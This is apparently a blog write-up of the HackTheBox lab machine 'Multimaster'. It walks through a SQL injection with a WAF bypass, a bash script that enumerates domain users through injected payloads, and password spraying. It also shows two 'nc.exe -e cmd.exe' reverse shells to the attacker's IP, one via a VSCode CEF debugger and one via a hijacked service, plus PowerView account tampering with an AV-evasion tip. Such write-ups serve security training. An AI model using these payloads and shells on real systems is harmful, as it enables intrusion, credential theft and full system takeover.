imth's blog

HackTheBox - Multimaster

  • Sep 19, 2020

HackTheBox - Multimaster

Foothold

Webserver with /api/getColleagues

SQL Injection with a WAF Bypass

User

Simple Data Exfil

http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/ https://blog.netspi.com/hacking-sql-server-procedures-part-4-enumerating-domain-accounts/

union injection to exfiltrate data

escaped unicode characters -> Bypass the waf enumerate database -> find table Logins with usernames and hashes

  • crack hashes and save passwords for later

Cracking the hashes

Enumerate Domain Users via RID

#!/bin/bash

function get_output {
  out=$(curl -X POST http://10.10.10.179/api/getColleagues -d "{\"name\":\"${1}\"}" -H "Content-Type: application/json" -s)
  resp=$(echo $out | cut -d '"' -f18)
  echo $resp
}

# TODO more enum scripts

# TODO

function dump_tables {

}

# TODO
function dump_hashes {

}

function find_domain {
  payload="-1' UNION ALL SELECT 1,2,3,4,DEFAULT_DOMAIN(); --"
  enc_payload=$(python charunicodeescape.py "$payload")
  get_output $enc_payload
}

# Enumerates MSSQL Users by ID
function find_by_id {
  for id in {1..300}; do
    payload="-1' UNION ALL SELECT 1,2,3,4,SUSER_NAME($id); --"
    enc_payload=$(python charunicodeescape.py "$payload")
    resp=$(get_output $enc_payload)
    [ ! -z "$resp" ] && echo ID=$id USER=$resp
    sleep 2
  done
}

function get_sid {
  payload="-1' UNION ALL SELECT 1,2,3,4,CONVERT(char(100),SUSER_SID('MEGACORP\Domain Users'),1); --"
  enc_payload=$(python charunicodeescape.py "$payload")
  get_output $enc_payload
}

# Enumerates Domain Users by SID
function find_by_sid {
  sid=$(get_sid | head -c-9)
  for x in {500..1500}; do
    v=$(printf "%08x\n" $x | tr a-z A-Z) # print as hex and pad with 8 zeros
    hex=${v:6:2}${v:4:2}${v:2:2}${v:0:2} # convert to little endian
    payload="-1' UNION ALL SELECT 1,2,3,4,SUSER_SNAME($sid$hex); --"
    enc_payload=$(python charunicodeescape.py "$payload")
    user=$(get_output $enc_payload)
    [ ! -z "$user" ] && echo ID=$hex USER=$user
    sleep 2
  done
}

echo "######## MSSQL Domain Enumeration ########"
echo ""
echo "Domain: "$(find_domain)
#find_by_id
#get_sid
find_by_sid

Password Spraying

bruteforce login via smb with found users and previously cracked passwords

login with evil-winrm

tushikikatomo -> cyork

netstat -a to identify ports listening on 127.0.0.1 ps | Select-String "Code"

VSCode is being run in intervals, we also notice the listening ports are changing and only open when VSCode is running Electron CEFDebugger listening (NodeJS)

https://github.com/taviso/cefdebug

we can abuse it with this tool called cefdebug

cefdebug.exe # identify correct url
cefdebug.exe --code "process.mainModule.require('child_process').exec('C:\\windows\\system32\\spool\\drivers\\color\\nc.exe -e cmd.exe 10.10.14.17 1338')" --url ws://127.0.0.1/{<some-uuid>}

cyork -> sbauer

net user cyork

-> Member of the Developers Group we can read the C:\inetpub\wwwroot Directory somewhere inside we find MultimasterAPI.dll and MultimasterAPI.pdb

easily decompile it with dnSpy or similar tools

find credentials for the MSSQL User finder

Password Spraying (again)

another bruteforce attack with this password on all domain users (patator smb_login)

we can login as sbauer, also part of Remote Management -> evil-winrm

sbauer -> jorden

run sharphound

-> GenericWrite privileges on jorden
   # Command to Get rid of comments and possible AV Signatures
   # sed '/<#/,/#>/d' powerview.ps1 > new_powerview.ps1
   # Credit: https://implicitdeny.org/2016/03/powerview-caught-by-sep/
-> use PowerView.ps1 to abuse them in the following way:

*Evil-WinRM* PS C:\Users\sbauer\Documents> Set-DomainObject -Identity jorden -XOR @{useraccountcontrol=4194304} -Verbose
Verbose: [Get-DomainSearcher] search base: LDAP://DC=MEGACORP,DC=LOCAL
Verbose: [Get-DomainObject] Get-DomainObject filter string: (&(|(|(samAccountName=jorden)(name=jorden)(displayname=jorden))))
Verbose: [Set-DomainObject] XORing 'useraccountcontrol' with '4194304' for object 'jorden'
*Evil-WinRM* PS C:\Users\sbauer\Documents> Get-DomainUser jorden | ConvertFrom-UACValue

Name                           Value
----                           -----
NORMAL_ACCOUNT                 512
DONT_EXPIRE_PASSWORD           65536
DONT_REQ_PREAUTH               4194304

Privesc to System

jorden is Member of Server Operator group

We have permissions to modify,start & stop some services

Find services that are started in the context of LocalSystem

reg query HKLM\System\CurrentControlSet\Services /f LocalSystem /t REG_SZ /s

pick one and hope for the best

*Evil-WinRM* PS C:\Users\jorden\Documents> cmd /c sc config wisvc binpath= "%SystemRoot%\system32\spool\drivers\color\nc.exe -e cmd.exe 10.10.14.17 1338"
[SC] ChangeServiceConfig SUCCESS
*Evil-WinRM* PS C:\Users\jorden\Documents> cmd /c sc start wiSvc

PROFIT!!!

[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

*Evil-WinRM* PS C:\Users\jorden\Documents>

Shell as NT Authority/System

gg

Search